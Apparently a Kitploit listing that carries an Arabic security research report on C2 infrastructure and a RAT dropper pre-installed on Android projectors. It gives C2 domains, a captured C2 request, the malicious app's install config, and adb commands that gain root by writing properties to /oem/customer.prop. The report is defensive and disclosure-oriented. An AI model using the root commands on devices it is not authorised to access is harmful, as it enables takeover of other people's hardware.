Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Android-Projector-C2-Malware — تفكيك شبكة C2 لـ beamers الصينية - SilentSDK-Analysis | Kitploit
أدوات/GitHubGitHub/kavan00/android-projector-c2-malware
أمان أندرويدأمان الأنظمة المدمجةإدارة مؤشرات الاختراق (IOC)أمان إنترنت الأشياءتحليل الشبكة الجنائيالهندسة العكسيةتحليل البرمجيات الخبيثةالتحاليل الرقمية الجنائيةالقيادة والسيطرة

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
استخبارات التهديدات
أمن سلسلة التوريد
تحليل البرامج الثابتة
GitHubkavan00/android-projector-c2-malware

Android-Projector-C2-Malware

تفكيك شبكة C2 لـ beamers الصينية - SilentSDK-Analysis

عرض المستودع
18266منذ 5 أشهرلم تتم المراجعة بعد

البنية التحتية للقيادة والتحكم المثبتة مسبقًا وحمولة RAT على أجهزة عرض أندرويد

تقرير التحليل الفني — البحث الأمني


الأجهزة المتأثرة: العديد من أجهزة عرض الأندرويد من علامات تجارية مثل Nonete (مثل الطراز HY260Pro) (على الأرجح أيضًا عدة أجهزة عرض من Magcubic، Hotack، Huyukang وغيرها الكثير، حيث تقوم هذه الشركات بتوزيع نماذج مماثلة وهناك مؤشرات تدعم ذلك)
منصة المعالج: Allwinner H713 / sun50iw12p1 — قد يؤثر على جميع الأجهزة على هذه المنصة
فترة التحليل: 11–17 أبريل 2026
التصنيف: بنية تحتية للقيادة والتحكم مثبتة مسبقًا مع حمولة حصان طروادة للوصول عن بُعد


TL;DR

  • المشكلة: العديد من أجهزة عرض الأندرويد الرخيصة (ربما علامات تجارية مثل Magcubic، Hotack، إلخ، التي تستخدم شريحة Allwinner H713)، التي تُباع حاليًا بكميات هائلة على Amazon وeBay وAliExpress، مصابة بالبرمجيات الخبيثة مباشرة من المصنع (هجوم سلسلة التوريد، مشابه لحالات "BADBOX").
  • الآلية: تطبيق نظام يبدو غير ضار ("StoreOS") يعمل كـ حاقن (dropper) متنكر. يقوم بتحميل حاقن المرحلة الثانية المسمى "SilentSDK" بصمت تام في الخلفية ويقوم بتثبيته بأقصى صلاحيات النظام، والذي بدوره يقوم بتثبيت إطار عمل RAT معياري قائم على الإضافات واعي بالهندسة المعمارية وربما إطار تصيد.
  • الخطر: تنشئ البرمجية الخبيثة اتصال C2 إلى الصين (api.pixelpioneerss.com)، وتستخرج معرفات الجهاز الحساسة، ويمكنها تنزيل وتنفيذ أي كود خبيث إضافي بصلاحيات الجذر في أي وقت (chmod 777). بالإضافة إلى ذلك، تحتوي الأجهزة على أبواب خلفية مفتوحة للجذر.
  • التخفيف الفوري: يجب حظر نطاقات C2 (خاصة *.aodintech.com، api.pixelpioneerss.com، sta.smartinnovate.net) على مستوى الشبكة. يمكن للمستخدمين المتأثرين فقط تعطيل التطبيقات الخبيثة يدويًا عبر ADB، لأنها مدمجة بعمق في النظام.

إشعار الاستعجال

البنية التحتية للبرمجيات الخبيثة الموثقة في هذا التقرير مثبتة مسبقًا على أجهزة عرض أندرويد تُباع حاليًا بكميات كبيرة للمستهلكين النهائيين على Amazon وeBay وAliExpress. تشمل الأجهزة المتأثرة ربما عدة أسماء تجارية (Hotack، Huyukang، Magcubic، Nonete، من بين آخرين). تم تأكيد وجود بنية تحتية C2 متطابقة بشكل مستقل على أجهزة أخرى من نفس الشركة المصنعة (انظر القسم 13). يتطابق النمط مع حالات BADBOX.


جدول المحتويات

  1. تحديد الجهاز
  2. سير عمل التحقيق
  3. الوصول إلى الجذر — مسار الاستغلال
  4. استجابة خادم C2 — الأدلة الأساسية
  5. نظرة عامة على نظام البرمجيات الخبيثة
  6. StoreOS — تحليل الحاقن (com.htc.storeos)
  7. EventUploadService — القياس عن بعد (com.htc.eventuploadservice)
  8. ExpandSDK — حقن الإعلانات (com.htc.expandsdk)
  9. SilentSDK — تحليل حاقن المرحلة الثانية (com.hotack.silentsdk)
  10. البرمجية الخبيثة
  11. الأبواب الخلفية للنظام
  12. تحليل الشبكة الجنائي
  13. تزييف الجهاز (تزييف بصمة البناء)
  14. التأكيد الخارجي
  15. مؤشرات الاختراق (IOCs)
  16. تعيين MITRE ATT&CK
  17. التخفيفات الفورية
  18. المصادر

الجهاز المشترى: رابط Amazon - جهاز عرض Nonete Mini 4K 1080P


1. تحديد الجهاز

الخاصيةالقيمة
العلامة التجاريةNonete HY260Pro (طراز تبيعه شركات متعددة)
اسم الطراز الداخليNT10
SoCAllwinner sun50iw12p1 (ARM 32-bit)
نظام التشغيلSpectraOS (Android 11, Kernel 5.4.99)
بصمة البناء الحقيقيةAllwinner/h713_tuna_p3/h713-tuna_p3:11
بصمة البناء المزيفةADT-3/adt3/adt3:11/RP1A.201005.006
SELinuxPermissive (بدون تطبيق)
مفتاح توقيع المنصةمفتاح اختبار AOSP عام
شهادة OEMCN=蓝鲨, OU=www.bsh.me, C=CN
قناة البرامج الثابتةHY260Pro_SpectraOS_TPYB

ملاحظة حول النطاق: شريحة Allwinner H713 مدمجة في العديد من أجهزة عرض الأندرويد الرخيصة التي تُباع تحت أسماء تجارية متغيرة في السوق الأوروبية. تشير قاعدة البرامج الثابتة المتطابقة (h713_tuna_p3) ومشغل C2 المتطابق (Shenzhen Aodin Technology) بقوة إلى أن جميع الأجهزة من هذا المصنع تحتوي على نفس البنية التحتية.


2. سير عمل التحقيق

الخطوةالإجراءالنتيجة
1التقاط حركة مرور الشبكة باستخدام Wiresharkحركة HTTP إلى store-api.aodintech.com
2فك ترميز استجابة C2 المضغوطة بـ gzip7 تطبيقات، بما في ذلك "SilentTools" المخفي
3فك تشفير مسار التنزيل باستخدام AES-CBCالمفتاح [REDACTED]، رابط إلى ملف .bpp
4استغلال الجذر عبر /oem/customer.propuid=0(root) بعد حقن الخاصية
5تفريغ جنائي لـ /data، /oem، /systemملفات APK، قواعد بيانات، تكوينات
6تحليل ثابت لـ StoreOS DEXpm install -r -d، حماية عكس البايت
7هندسة عكسية لآلية reverseLenفهم الحماية ضد التحليل
8كسر حماية عكس البايتSilentSDK DEX مفكوك وقابل للتحليل
9فك تشفير سلاسل SilentSDK باستخدام XORتأكيد نطاق C2 api.pixelpioneerss.com
10التحقق من التجزئة عبر ثلاثة مصادرMD5/SHA-256 متطابقان تمامًا
11هندسة عكسية لعملية تنزيل البرمجية الخبيثةالخوادم لا تزال متصلة
12هندسة عكسية للبرمجية الخبيثةإطار عمل RAT قائم على الإضافات

3. الوصول إلى الجذر — مسار الاستغلال

تم تحقيق الوصول إلى الجذر من خلال مجموعة من ثلاث ثغرات:

  1. SELinux Permissive — يتم تسجيل انتهاكات الوصول فقط، دون منعها.
  2. قابلية الكتابة العالمية لـ /oem — يتم تحميل القسم كنظام FAT مع fmask=0000.
  3. تحميل customer.prop عند الإقلاع — يستبدل خصائص النظام.```bash adb shell getenforce # Result: Permissive adb shell ls -la /oem/ # All files world-writable

adb shell 'echo "ro.debuggable=1" >> /oem/customer.prop' adb shell 'echo "service.adb.root=1" >> /oem/customer.prop' adb shell 'echo "ro.secure=0" >> /oem/customer.prop'

adb reboot && adb wait-for-device && adb root adb shell id

uid=0(root) gid=0(root) context=u:r:su:s0

**التأثير:** أي مستخدم لديه وصول فعلي أو مهاجم على نفس الشبكة (عبر ADB، المنفذ 5555 مفتوح، دون مصادقة) يحصل على صلاحية الجذر الكاملة.

---

## 4. استجابة خادم C2 — الأدلة الأساسية

### طلب HTTP الملتقط```http
POST /sign/app/list HTTP/1.1
chanId: HY260Pro_SpectraOS_TPYB
timestamp: 1775904428922
sign: [REDACTED]
Content-Type: application/json;charset=UTF-8
Content-Length: 184
Host: store-api.aodintech.com
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: okhttp/5.0.0-alpha.12

استجابة الخادم (مفككة من pcapng - جدول)

تحتوي الاستجابة المضغوطة بـ gzip على قائمة JSON تحتوي على سبعة تطبيقات. ستة منها هي تطبيقات بث عادية (YouTube، Netflix، Disney+، Prime Video، Chrome، BrowseHere). السابع هو SilentTools:

التطبيقالحزمةisShowisForceisSilent InstallisSilent Uninstalllaunch Type
YouTubecom.google.android.youtube.tvtruefalsefalsefalse0
Disney+com.disney.disneyplustruefalsefalsefalse0
Netflixcom.netflix.mediaclienttruefalsefalsefalse0
Chromecom.android.chrometruefalsefalsefalse0
Prime Videocom.amazon.amazonvideo.livingroomtruefalsefalsefalse0
BrowseHerecom.tcl.browsertruefalsefalsefalse0
SilentToolscom.hotack.silentsdkfalsetruefalsetrue1

تكوين SilentTools بالتفصيل```json

{ "name": "SilentTools", "pkg": "com.hotack.silentsdk", "desc": "Special app", "icon": "http://cdn-store.aodintech.com/com.hotack.silentsdk/image/95630a5e-e05e-4dba-814a-cf2742585b39.png", "category": "htc", "zone": "Global", "developer": "htc", "isForce": true, "verCode": 4, "verName": "2509041614", "verDesc": "SilentSDK", "installType": 0, "appType": "apk", "reverseLen": 63995, "path": "W15UOdzUbX72/67VLbV2cMLetfnsudxCpedAqw2GjJ8pvLI56S0gTzrp4HaetoVK3PdHXvM9vw7g+F4eFGhHDNvARfeM38tkcqo7gOpulNCb1gKYE2rmjWa+6RdjhB84+g403UUicBfFf5vHDoOEgA==", "size": 2474873, "md5": "5df097591d6942bae4eff33a37c4e28f", "upDate": "2025-09-04", "isShow": false, "isSilentInstall": false, "isSilentUninstall": true, "isBootStartup": false, "launchType": 1, "launchParam": "com.hotack.silentsdk.MyService" }

**تفسير العلامات:**
تنزيل الأداة